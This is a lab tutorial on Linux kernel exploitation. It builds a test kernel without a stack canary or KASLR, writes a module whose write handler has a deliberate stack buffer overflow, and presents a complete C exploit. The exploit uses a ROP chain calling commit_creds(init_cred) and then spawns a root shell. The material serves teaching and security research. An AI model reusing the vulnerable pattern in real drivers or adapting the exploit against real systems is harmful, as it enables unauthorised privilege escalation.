Preparations
To accomplish the above goals, you’ll need the following utilities:
- GCC – a C compiler (to compile the kernel);
- GDB – a debugger (to debug the kernel);
- BC – a tool required to build the kernel;
- Make – a build tool that runs the kernel’s compilation recipes;
- Python – the interpreter for the Python language (to be used by GDB modules);
- pacstrap or debootstrap – system deployment scripts (required to build rootfs);
- any text editor (Vim or nano will be OK) to write the module and a recipe for it; and
- qemu-system-x86_64 – a virtual machine to run the kernel.
This humble set of tools is sufficient to build a kernel and exploit its module containing a vulnerability.
Kernel
First of all, you have to build a Linux kernel.
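For experimental purposes, I suggest taking the most recent stable kernel from kernel.org. At the time of writing, it was Linux 5.12.4. The kernel version is unlikely to affect the result of the experiment, so you can safely take the most current one. Keep in mind, though, that kernel-internal APIs change between releases: for example, since Linux 6.4 class_create() takes only the class name, so the module code may need small adjustments on newer kernels. Download the archive, unpack it with the tar command, and go to the newly created folder.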
Configuration
You don’t have to build a universal kernel that can be run on any hardware. All you need is to run it in QEMU, and the basic configuration suggested by the developers is quite suitable for this purpose. Still, you have to make sure that you’ll have debugging symbols after the compilation and that you don’t have a stack canary (I’ll discuss this bird in more detail later).
There are many ways to set a correct configuration, but I strongly recommend using menuconfig, since it’s convenient and doesn’t require a GUI. Run the make command with this target, and the configuration menu will appear.
To enable debugging symbols, go to Kernel hacking → Compile-time checks and compiler options. Select “Compile the kernel with debug info” and “Provide GDB scripts for kernel debugging.” In addition to the debugging symbols, you’ll get a very useful script, vmlinux-gdb.py: a GDB module that helps to determine such things as the module base address in kernel memory.
Now you have to disable the stack protector to make your module exploitable. To do this, return to the main configuration screen, then go to “General architecture-dependent options”, and disable the “Stack Protector buffer overflow detection” function.
Press the “Save” button and exit the configuration windows. Later, you’ll see what this setting does.
Kernel compilation
There is nothing complicated here. Execute the command make
(threads
is the number of threads you want to use for kernel compilation) and watch the process.
The compilation speed depends on the processor: on a powerful computer, it takes some five minutes; on a weak one, much longer. In the meantime, you can continue reading this article.
Kernel module
The Linux kernel includes special files called character devices. In simple terms, a character device is a kind of a ‘device’ that can be used to perform basic operations, such as reading from and writing to it. But sometimes, this device may be paradoxically absent on your PC. Imagine, for instance, a device with the path /
; if you read from it, you’ll get zeros (zero bytes or \
in C notation). Such devices are called virtual ones, and the kernel includes special read and write handlers for them. You are going to write a kernel module that will enable you to write to the device (let’s call it /
), and the write
function for this device (the one called by the write
system call) will contain a buffer overflow vulnerability.
Module code and explanations
Create the vuln
subfolder to store the module in the folder with the kernel source code and place there the file vuln.
with the following content:
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/kdev_t.h>
#include <linux/device.h>
#include <linux/cdev.h>

MODULE_LICENSE("GPL"); // License

static dev_t first;
static struct cdev c_dev;
static struct class *cl;

static ssize_t vuln_read(struct file* file, char* buf, size_t count, loff_t *f_pos)
{
    return -EPERM; // You don't need to read from the device; so, make it inaccessible for reading
}

static ssize_t vuln_write(struct file* file, const char* buf, size_t count, loff_t *f_pos)
{
    char buffer[128];
    int i;
    memset(buffer, 0, 128);
    for (i = 0; i < count; i++){ // count is never checked against the buffer size: this is the bug
        *(buffer + i) = buf[i];
    }
    printk(KERN_INFO "Got happy data from userspace - %s", buffer);
    return count;
}

static int vuln_open(struct inode* inode, struct file* file)
{
    return 0;
}

static int vuln_close(struct inode* inode, struct file* file)
{
    return 0;
}

// Structure with file operations and their handlers
static struct file_operations fileops = {
    .owner = THIS_MODULE,
    .open = vuln_open,
    .read = vuln_read,
    .write = vuln_write,
    .release = vuln_close,
};

int vuln_init(void)
{
    alloc_chrdev_region(&first, 0, 1, "vuln"); // Allocate a device number for the device
    cl = class_create(THIS_MODULE, "chardev"); // Create the device class
    device_create(cl, NULL, first, NULL, "vuln"); // Create the device itself
    cdev_init(&c_dev, &fileops); // Set handlers
    cdev_add(&c_dev, first, 1); // Add the device to the system
    printk(KERN_INFO "Vuln module started\n");
    return 0;
}

void vuln_exit(void)
{
    // Remove and unregister the device
    cdev_del(&c_dev);
    device_destroy(cl, first);
    class_destroy(cl);
    unregister_chrdev_region(first, 1);
    printk(KERN_INFO "Vuln module stopped??\n");
}

module_init(vuln_init); // Module entry point called by the insmod command
module_exit(vuln_exit); // Module exit point called by the rmmod command
This module creates a vuln
device in /
, and you can write data to this device. Its path is simple: /
. One might ask: what about the functions that have no comments? Their descriptions are available in this repository, which most likely covers every function documented in the Linux kernel, in the form of man
pages.
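From userspace, writing to such a device is an ordinary open/write pair. The helper below is a minimal sketch of that; the name write_to_device is made up for illustration, and the device path is whatever node the module created (/dev/vuln in the exploit code later in this article).

```c
#include <fcntl.h>
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: open a device node for writing and push len bytes
 * into it. Returns the number of bytes written, or -1 on error. */
ssize_t write_to_device(const char *path, const void *data, size_t len)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;

    /* For a character device, this call ends up in the driver's
     * write handler (vuln_write in this article's module). */
    ssize_t written = write(fd, data, len);
    close(fd);
    return written;
}
```

Calling write_to_device("/dev/vuln", "asdf", 4) from a small test program should make the module print its message to the kernel log.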
Vulnerability
Note the vuln_write
function. 128 bytes are allocated on the stack for a message that will be written to your device and then outputted to kmsg
, the device for kernel logs. However, both the message and its size are controlled by the user, and the copy loop never checks the size against the 128-byte buffer, so the user can write much more data than intended. The result is a stack buffer overflow that overwrites the saved return address and gives the attacker control of the RIP register (the instruction pointer), which in turn makes it possible to build a ROP chain. I’ll explain this in more detail in the section describing the vulnerability exploitation.
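For contrast, here is a sketch of what a bounded copy could look like. It is plain userspace C, so it only illustrates the length check; the names bounded_copy and VULN_BUF_SIZE are invented for this example, and a real driver would additionally move the data with copy_from_user() instead of reading the user pointer directly.

```c
#include <stddef.h>
#include <string.h>

#define VULN_BUF_SIZE 128 /* same size as buffer[] in vuln_write */

/* Copy at most dst_size - 1 bytes and NUL-terminate the result, so that
 * a later "%s" print stays inside the buffer.
 * Returns the number of bytes actually copied. */
size_t bounded_copy(char *dst, size_t dst_size, const char *src, size_t count)
{
    if (dst_size == 0)
        return 0;

    size_t n = count < dst_size - 1 ? count : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}
```

With a check like this, anything beyond 127 bytes is simply dropped and the return address stays intact, which is exactly what the vulnerable module does not do.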
Module compilation
Module compilation is a pretty trivial task. To do this, create in the folder with the module source code a Makefile with the following content:
# Add to the list of compiled modules
obj-m := vuln.o

# Call the main Makefile with the argument M=<module folder> to compile the module
all:
	make -C ../ M=./vuln
After the compilation, the vuln.
file will appear in the folder. The ko
extension means Kernel Object, and it’s slightly different from regular .
objects. Congrats! You have built the kernel and a module for it. But before running it in QEMU, a few more operations have to be performed.
Rootfs
Contrary to popular belief, Linux by itself is not an operating system. It is just a kernel, and it becomes a fully featured operating system only in combination with userspace utilities and programs, most commonly those of the GNU project (hence the name GNU/Linux). If you start Linux alone, it will report a kernel panic and notify you that there is no file system that can be used as the root. Even if there is a file system, the kernel will first try to start init
, a binary representing the main daemon process in the system that starts all services and other processes. If this file doesn’t exist or doesn’t work properly, the kernel will report panic. Therefore, you have to create a partition with userspace programs. For this purpose, I use pacstrap, a script installing Arch Linux. If you work with a Debian-like system, you can use debootstrap.
Possible variants
There are many ways to build a fully functional system; for instance, you can use LFS (Linux From Scratch), but this is too complicated. It’s also possible to create initramfs
(a file with a minimal filesystem required to perform some tasks prior to loading the main system). But the disadvantage of this method is that it’s difficult to make such a disk and even more difficult to edit it: the disk will have to be rebuilt from scratch. Therefore, let’s use another option: creation of the complete ext4 filesystem in a file.
Making disk
First, you have to allocate space for the filesystem. To do this, execute the command dd
. It will fill rootfs.
with zeros and set its size to 2 GB. Then you have to create an ext4 filesystem in this file. Run mkfs.
. You don’t need the superuser rights since the filesystem is created in your file. And the last operation prior to the system installation is: sudo
. Now you’ll need the superuser rights to mount this file system and perform manipulations inside it.
Installing Arch
Sounds scary? Don’t worry, when it comes to Manjaro or another similar Arch Linux system, everything is quite simple. There is a package in the repositories called arch-install-scripts
, and it contains pacstrap
. After installing this package, execute the command sudo
and wait until all the main packages are downloaded.
Then copy vuln.
using the command:
cp <kernel sources>/vuln/vuln.ko /mnt/vuln.ko
Now the module is in the system.
Configuring the filesystem from inside
To be able to log into the system, you have to set up a superuser password. For this purpose, use arch-chroot
, which automatically prepares the entire environment in the newly created system. Run the command sudo
and then passwd
. Now you can log into the system after the boot-up.
You will also need two packages: GCC and any text editor (e.g. Vim). They are required to write and compile the exploit. To get these packages, use the command apt
on a Debian system and pacman
on an Arch-like OS. In addition, you have to create an unprivileged user on whose behalf you will test the exploit. To do this, run the commands useradd
and passwd
so that it has a home folder.
Exit chroot
by pressing Ctrl + d and type sync
(just in case).
Final touches
Mount rootfs.
using the command sudo
. After writing to /
, I always execute sync
to make sure that the written data aren’t lost in the cache. Now you are ready to run the kernel with your handmade module.
Running the kernel
After the compilation, the compressed kernel is located in <
. Even though it’s compressed, the kernel will run smoothly in QEMU because this is a self-extracting binary.
Provided that you are in the <
folder and rootfs.
is also located there, the command starting the kernel will be as follows:
qemu-system-x86_64 \
-kernel ./arch/x86/boot/bzImage \
-append "console=ttyS0,115200 root=/dev/sda rw nokaslr" \
-hda ./rootfs.img \
-nographic
In kernel
, you specify the path to the kernel, append
is the kernel command line, console=ttyS0,
indicates that the output will be transmitted to the ttyS0
device at a baud rate of 115,200 bps (this is a serial port from where QEMU gets the data). The argument root=/
makes the disk that you have attached with the hda
key the root filesystem, while rw
makes this filesystem accessible for reading and writing (by default, it’s read-only). The nokaslr
parameter disables the randomization of addresses of kernel functions in the virtual memory. This option will simplify exploitation. Finally, -nographic
launches the kernel without a separate window (i.e. right in the console).
After launching the kernel, you can log in and access the console. However, if you go to /
, you won’t find your device. To make it appear, you have to run the command insmod /
. Startup messages will be added to kmsg
, and the vuln
device will appear in /
. However, there is a little problem: /
has permissions of 600. For exploitation, you need permissions of 666 or at least 622 so that any user can write to this file. Of course, you can manually enable a module in the kernel and change the permissions of a device, but this would be unprofessional. Just imagine that this is an important module that must be always launched together with the system. Therefore, this process must be automated.
Service for systemd
There are many ways to automate boot processes: you can write a script in /
, you can place it in ~/.
, or you can even rewrite init
so that your script starts first and the rest of the system after it. However, the easiest way is to write a service for systemd
, the program that is init
itself and can automate things in an orderly way. Further steps will be performed in the system running in QEMU, and it will save all changes you have made.
The service itself
Basically, you have to do two things: load the module to the kernel and change the /
permissions to 666. The service is run as a script: once during the boot-up. Therefore, the service type is oneshot
.
[Unit]
# Human-readable description of the service
Description=Vulnerable module

[Service]
# Service type: the commands are executed once
Type=oneshot
# Load the module and change the permissions of the device
ExecStart=insmod /vuln.ko ; chmod 666 /dev/vuln

[Install]
# Start the service as part of the regular multi-user boot
WantedBy=multi-user.target
This code has to be stored in /
.
Running the service
Since the script must be run during the boot-up, the systemctl
command has to be executed on behalf of superuser.
After the restart, the vuln
file in /
will gain the rw-rw-rw-
permissions, which is great. Time has come for the most exciting part of the experiment. Press Ctrl + A, C, and D to exit QEMU.
Kernel debugging
You have to debug the kernel to see how it behaves during your calls. This will give you an idea of how to exploit the vulnerability. Seasoned pentesters are most likely aware of the ‘one gadget’ in libc
, the standard C library on Linux: a piece of code that makes it possible to run /
from a vulnerable program in userspace almost immediately.
GDB and vmlinux-gdb.py
To make your job easier, I strongly recommend using GEF. This GDB module shows the states of registers, stack, and code during runtime. You can get it here.
The first step is to allow the loading of third-party scripts, namely vmlinux-gdb.
(that is currently stored in the source code root folder, as well as vmlinux
, the file with kernel symbols). Later, this script will help you to find out the base address of the kernel module. To do this, add the line set
to ~/.
. Now, to load the symbols and the code, run the gdb
command. After that, start the kernel.
Remote kernel debugging
You already know how to start the kernel. The only problem is that it cannot be debugged. To enable debugging, you need QEMU to run a GDB server. To do this, add -gdb
to the command (tcp
is the connection protocol, while 1234
is the port). Start the kernel using the modified command and launch GDB in another window. To connect to the kernel, execute the command target
. The kernel will stop and wait for your actions.
You can see that QEMU is now frozen in a specific state because the kernel is stopped. Use the continue
command in GDB to resume its work. To pause, press Ctrl + C.
Exploitation strategy
In essence, kernel exploitation means privilege escalation – in most cases, to root. One of the ways to achieve this goal is as follows: you have to call the commit_creds
function with the init_cred
argument. Commit_creds
will grant the privileges described in init_cred
to the process. Init_cred
, in turn, has the permissions of the process number one (i.e. init, the maximum possible privileges in userspace). In the kernel code, it looks as follows:
struct cred init_cred = {
    .usage = ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
    .subscribers = ATOMIC_INIT(2),
    .magic = CRED_MAGIC,
#endif
    .uid = GLOBAL_ROOT_UID,
    .gid = GLOBAL_ROOT_GID,
    .suid = GLOBAL_ROOT_UID,
    .sgid = GLOBAL_ROOT_GID,
    .euid = GLOBAL_ROOT_UID,
    .egid = GLOBAL_ROOT_GID,
    .fsuid = GLOBAL_ROOT_UID,
    .fsgid = GLOBAL_ROOT_GID,
    .securebits = SECUREBITS_DEFAULT,
    .cap_inheritable = CAP_EMPTY_SET,
    .cap_permitted = CAP_FULL_SET,
    .cap_effective = CAP_FULL_SET,
    .cap_bset = CAP_FULL_SET,
    .user = INIT_USER,
    .user_ns = &init_user_ns,
    .group_info = &init_groups,
};
A more detailed description of this function is available in the above-mentioned repository. Overall, you have to somehow execute commit_creds(
while writing data to the vulnerable device. Let’s figure out how to do this.
Calling convention
Experienced pentesters can skip this section and two subsequent ones. Imagine that you have some standard code in C (e.g. sum(
). In its original form, the code looks very simple, but the processor doesn’t work with the source code: it uses instructions generated by the compiler. For the processor, this string will look as follows:
mov rdi, 3 ; Place the first argument in the RDI register
mov rsi, 2 ; Place the second argument in the RSI register
call sum   ; Call the sum function
As can be seen from the code, the first argument is stored in the RDI
register; while the second one, in RSI
. The output of this function (in this case, most likely 5) will be stored in the RAX
register. The x86_64 architecture has 16 general-purpose registers: RAX
, RBX
, RCX
, RDX
, RDI
, RSI
, RSP
, RBP
, and R8-R15
; each of them stores 64 bits of information. So, to call the commit_creds(
function, you have to place the init_cred
address to the RDI
register and then call commit_creds
. Another important register is RSP (the stack pointer). It holds the address of the top of the stack, from where values are taken (e.g. by the ret
or pop
instructions).
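For reference, the C side of that assembly listing could be as small as the function below. This is only an illustration: the article does not show the body of sum, and the register assignment in the comment follows the System V AMD64 calling convention used on Linux.

```c
/* With the System V AMD64 calling convention, a arrives in RDI,
 * b arrives in RSI, and the result is returned in RAX. */
long sum(long a, long b)
{
    return a + b;
}
```

Compiling a call such as sum(3, 2) and looking at the disassembly is a quick way to see the mov/mov/call pattern for yourself.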
ret
Ret
is an instruction that pops the 64-bit value from the top of the stack and jumps to that address. How can you use it for your purposes? The point is that the only thing you can actually control is the stack. Almost any function in assembly ends with the ret
instruction that passes control to the calling function. If you can overwrite the so-called return address (the one that ret takes
from the stack), then you can control the code execution process, which is very useful. So, all you have to do is write init_cred
to RDI
.
Gadgets: pop rdi ; ret
Any compiled program includes small pieces of code that can be used to build a ROP chain. ROP (Return Oriented Programming) is a binary exploitation technique that allows you to write your own program inside the target program (provided that you control the stack), and your program performs whatever you need. These small pieces of code are called gadgets.
You have to find a gadget that takes a value from the stack you control, puts it in the RDI register, and shifts the pointer to the stack. The pop
instruction is ideal for this. It takes a value from the stack, puts it into the register, and shifts the stack. Then you need the ret
command that will jump to the commit_creds
address, thus, almost making a call
. Use the ROPGadget program to find such a gadget: run the command ROPGadget
and check the address of the found piece of code.
Save this address for future use.
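To see how ret and the pop rdi ; ret gadget consume the attacker-controlled stack, here is a toy model in C. It is not an emulator: the struct toy_cpu and the toy_* functions are invented for this sketch and only track RSP, RIP, and RDI.

```c
#include <stdint.h>

/* Toy CPU state: only what the chain needs. */
struct toy_cpu {
    const uint64_t *rsp; /* stack pointer: next 64-bit word to be popped */
    uint64_t rip;        /* address where execution continues */
    uint64_t rdi;        /* first-argument register */
};

/* ret: pop one word from the stack into RIP. */
static void toy_ret(struct toy_cpu *cpu)
{
    cpu->rip = *cpu->rsp++;
}

/* The gadget "pop rdi ; ret": pop one word into RDI, then ret. */
static void toy_pop_rdi_ret(struct toy_cpu *cpu)
{
    cpu->rdi = *cpu->rsp++;
    toy_ret(cpu);
}

/* Replay the first two steps of the chain on an attacker-built stack:
 * stack[0] = gadget address, stack[1] = value for RDI,
 * stack[2] = address to "call" next. */
void toy_run_chain(struct toy_cpu *cpu, const uint64_t *stack)
{
    cpu->rsp = stack;
    toy_ret(cpu);         /* ret at the end of the vulnerable function */
    toy_pop_rdi_ret(cpu); /* execution is now "at" the gadget */
}
```

After toy_run_chain, RDI holds the second stack word and RIP holds the third, which is the situation you want with init_cred in RDI and execution continuing at commit_creds.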
A few words about the test kernel and simplifications
This is an important point since the kernel has been built with the “Stack Protector buffer overflow detection” option disabled. Although this kernel is used just as an example, enabling this option will most likely make the module unexploitable in the way described here. To be specific, you won’t be able to escalate privileges, but can easily crash the kernel.
This option adds a ‘stack canary’: a random number that is placed on the stack at the beginning of a function and checked at the end. If an overflow overwrites it, the kernel detects the corruption and panics instead of returning to an attacker-controlled address.
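The idea of the canary check can be modelled in a few lines of userspace C. This is a toy under stated assumptions: struct toy_frame is an invented layout, not the real kernel stack frame, and the compiler-generated check is replaced by an explicit comparison.

```c
#include <stdint.h>
#include <string.h>

/* Toy layout of a protected stack frame (not the real kernel layout). */
struct toy_frame {
    char buffer[128];
    uint64_t canary;      /* written on function entry */
    uint64_t return_addr; /* what the attacker wants to overwrite */
};

/* Copy count bytes into the frame without checking them against the
 * buffer size, then do what the function epilogue does: compare the
 * canary with the expected value.
 * Returns 1 if the frame is intact, 0 if an overflow was detected. */
int toy_write_and_check(struct toy_frame *frame, uint64_t expected_canary,
                        const void *data, size_t count)
{
    frame->canary = expected_canary;
    if (count > sizeof(*frame))
        count = sizeof(*frame); /* keep the toy itself memory-safe */
    memcpy(frame, data, count); /* the overflow stays inside the struct */
    return frame->canary == expected_canary;
}
```

Because the canary sits between the buffer and the return address, a linear overflow cannot reach the return address without changing the canary first, unless the attacker already knows its value.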
On the other hand, you have probably noticed the word nokaslr
in the append
parameter of the QEMU startup command. The kernel, similar to any program in userspace, doesn’t want to be hacked. Therefore, there is such a thing in userspace as ASLR (Address Space Layout Randomization).
Imagine that you have a program that has the function you need at the address 0x50000
. The problem is that it cannot be executed directly in the code, but there is another function that has a buffer overflow vulnerability. In the absence of ASLR, a hacker can jump to this function and crack the program; but if ASLR is enabled, then the address of the target function changes randomly. As a result, the hacker first needs to find out the base address of the program and then calculate the real address of the function. ASLR was invented to make the exploitation of vulnerabilities much more difficult. Similar to ASLR, kaslr
was created for the kernel with the purpose to randomize its base address. Accordingly, the address received at the last step would be incorrect if kaslr
is enabled. Therefore, to simplify the exploitation, you turned off kaslr
using the nokaslr
parameter.
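The address calculation that KASLR forces on an attacker is simple arithmetic once the base address has leaked. The sketch below assumes the default x86_64 layout, where the kernel text starts at 0xffffffff81000000 when randomization is off; the function name rebase_symbol is made up for this example.

```c
#include <stdint.h>

/* Start of the kernel text on x86_64 with the default configuration
 * and KASLR disabled (an assumption about the build). */
#define KERNEL_TEXT_BASE_NOKASLR 0xffffffff81000000ULL

/* Given a symbol address taken from a nokaslr boot and the base address
 * leaked from a randomized boot, return the symbol's real address. */
uint64_t rebase_symbol(uint64_t addr_nokaslr, uint64_t leaked_base)
{
    uint64_t offset = addr_nokaslr - KERNEL_TEXT_BASE_NOKASLR;
    return leaked_base + offset;
}
```

For instance, a function found at 0xffffffff81084540 without KASLR would sit at 0xffffffff9c084540 if the kernel were loaded at the (purely hypothetical) base 0xffffffff9c000000. The hard part in practice is obtaining the leak, not the arithmetic.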
Final strategy
Overall, you have to perform five operations:
- Overflow the buffer with garbage data;
- Jump to pop rdi; ret;
- Write init_cred to RDI;
- Jump to commit_creds; and
- Return from the system call without any incidents.
You already know how to perform operations 2, 3, and 4. The only remaining steps are 1 and 5.
Overflow
Let’s examine the module code, namely the vuln_write
function, once again:
static ssize_t vuln_write(struct file* file, const char* buf, size_t count, loff_t *f_pos)
{
    char buffer[128];
    int i;
    memset(buffer, 0, 128);
    for (i = 0; i < count; i++){
        *(buffer + i) = buf[i];
    }
    printk(KERN_INFO "Got happy data from userspace - %s", buffer);
    return count;
}
You don’t know how the compiler will store int
(i.e. whether it will be on the stack or in a register); therefore it’s time to review the disassembler output for this function.
To do this, you have to load the module code to GDB. First, run lx-lsmod
provided in vmlinux-gdb.
and find out the address of the vuln
module. Knowing the base address of the module, you can load vuln.
. Execute the command add-symbol-file ./
where address
is the hexadecimal value taken from lx-lsmod
. The function name is vuln_write
; so, type disassemble
.
You don’t need all these scary-looking instructions: select only those that operate with the stack. The first one is push
; at the end, it will be returned by pop
. This means that 8 bytes are already occupied. Next is the instruction add
; in fact, it doesn’t add to, but instead subtracts from rsp~
is decimal 128. In other words, this function allocates 128 bytes for the buffer and 8 more bytes to store r12
, i.e. 128 + 8 = 136 bytes.
By the way, if you look further, you will see that the i
variable is the edx
register (i.e. the lower 32 bits of the rdx
register). The return address from vuln_write
will be located immediately after the above-mentioned 136 bytes. So, to overflow the stack, you first have to fill 136 bytes with garbage data and then use a ROP Chain. Traditionally, A
characters are used as garbage; so, your exploit will begin with 136 A
characters. Knowing how to overflow the stack, you can proceed to the last point of this exploitation experiment.
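The offset arithmetic above can be written down as constants. The numbers come from the disassembly discussed in this section, so treat them as specific to this build: another compiler or kernel configuration may produce a different frame. The names are invented for this sketch.

```c
#include <stddef.h>

enum {
    BUFFER_SIZE = 128,                     /* char buffer[128] in vuln_write */
    SAVED_REG   = 8,                       /* the register pushed on entry (r12) */
    RET_OFFSET  = BUFFER_SIZE + SAVED_REG, /* 136: first byte of the return address */
    WORD        = 8                        /* one 64-bit stack slot */
};

/* Total payload length for a chain of chain_words 64-bit values
 * placed right where the return address starts. */
size_t payload_length(size_t chain_words)
{
    return RET_OFFSET + chain_words * WORD;
}
```

A chain of four values (gadget, init_cred, commit_creds, final return address) gives payload_length(4) == 168 bytes.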
Return from the system call
Here is a slight problem: you will overwrite exactly four 64-bit values on the stack after r12
, but this stack is, in fact, of no importance to you. Furthermore, the stack will be shifted by these 32 bytes. Therefore, there is no point in returning to the address where vuln_write
was initially supposed to return: the kernel can get to a wrong address and crash. To find out where to jump, you need to debug a little more and find out where vuln_write
should return.
Monitoring the vuln_write execution
Set a breakpoint at vuln_write
using the GDB command hbreak
. Then type continue
and resume the kernel operation. Enter the echo
command in QEMU to initiate writing asdf
to /
. Note that the kernel has paused and switch back to GDB. Using the ni
command, you have to get to the ret
instruction. Exit the function using ni
and continue moving forward until you reach the pop
instructions. As you can see, there are only six of them prior to ret
.
As said above, the stack is shifted by 32 bytes, but out of this amount, 8 bytes are occupied by the ret
instruction at the end of vuln_write
. This means that the stack is broken by 24 bytes. To fix it, you have to skip three pop
instructions. Although there is some code prior to these instructions, you have no choice but to ignore it. Remember the address of the 4th pop
instruction (pop
). You will jump to it after executing vuln_write
. Finally, you are ready to write the exploit.
Exploit
Make sure that GCC and a text editor (e.g. Vim) are installed in rootfs.
. This has to be done outside of QEMU because QEMU doesn’t have access to the Internet, and these packages cannot be installed from inside.
Getting addresses
To obtain the addresses of init_cred
and commit_creds
, execute the print
and print
commands in GDB.
Exploit as it is
The exploit will be written in C (which is logical for kernel exploitation). First, open /
for writing only. You will write to it the buffer containing your payload. The payload consists of 136 A
(or whatever) characters followed by the sequence of pop
, init_cred
, and commit_creds
addresses and ending with the pop
return address.
Important: the addresses will be written in reverse order (e.g. if the init_cred
address is 0xffffffff8244d2a0
, it will be written as \
). This is because x86_64 is a little-endian architecture. After creating the payload, write it to /
. As a result, the exploit process should gain superuser rights. To get a shell on behalf of the root, execute the command execve(
. The exploit code should look something like this:
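#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main()
{
    unsigned char* kekw = malloc(168);

    // 136 bytes of garbage that fill the buffer and the saved r12
    memset(kekw, 'A', 136);

    // ROP chain: four little-endian addresses taken from this particular kernel build
    memcpy(kekw + 136,
        "\x41\x1a\x00\x81\xff\xff\xff\xff"  // pop rdi; ret gadget (its low byte 0x41 is also ASCII 'A')
        "\xa0\xd2\x44\x82\xff\xff\xff\xff"  // init_cred
        "\x40\x45\x08\x81\xff\xff\xff\xff"  // commit_creds
        "\x23\x22\x1d\x81\xff\xff\xff\xff", // pop instruction to return to
        32);

    int fd = open("/dev/vuln", O_WRONLY);
    write(fd, kekw, 168);            // Trigger the overflow in vuln_write
    execve("/bin/bash", NULL, NULL); // Start a shell with the new credentials
}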
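Typing reversed bytes by hand is error-prone, so the payload can also be assembled from ordinary 64-bit numbers. The helpers below are a sketch with invented names (put_le64, build_payload); the addresses you pass in must come from your own GDB session, not from this article.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store a 64-bit value least-significant byte first (little-endian). */
static void put_le64(unsigned char *dst, uint64_t value)
{
    for (int i = 0; i < 8; i++)
        dst[i] = (unsigned char)(value >> (8 * i));
}

/* Fill out[] with padding 'A' bytes followed by the chain words.
 * Returns the number of bytes written, or 0 if out[] is too small. */
size_t build_payload(unsigned char *out, size_t out_size, size_t padding,
                     const uint64_t *chain, size_t chain_words)
{
    size_t total = padding + chain_words * 8;
    if (total > out_size)
        return 0;

    memset(out, 'A', padding);
    for (size_t i = 0; i < chain_words; i++)
        put_le64(out + padding + i * 8, chain[i]);
    return total;
}
```

With a padding of 136 and a chain of four addresses, build_payload produces the same 168-byte layout as the hand-written buffer, and changing an address no longer means re-reversing its bytes.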
Running the exploit
Make sure that you act on behalf of an unprivileged user. Log in as user
, compile the exploit with GCC, run it and… Voilà! You can see that bash has started on behalf of the superuser. Note that root doesn’t own the binary, and the setuid bit isn’t set on it: this confirms that the privileges were obtained through the kernel.
Conclusions
Congrats! You have successfully completed the following tasks:
- Compiled a kernel with debugging symbols;
- Learned how to write a module and compile it;
- Built a root file system (rootfs) for the kernel to start with;
- Wrote a small oneshot service for systemd;
- Learned how to debug the kernel with GDB;
- Learned the ROP concept; and
- Used this trick to hack the kernel.
Of course, this was just a small step towards real-life kernel exploitation. As mentioned above, if KASLR or Stack protector were enabled, kernel exploitation would be impossible (or significantly more difficult). Still, I hope that this experience was interesting and useful to you. Good luck in your further pentesting endeavors!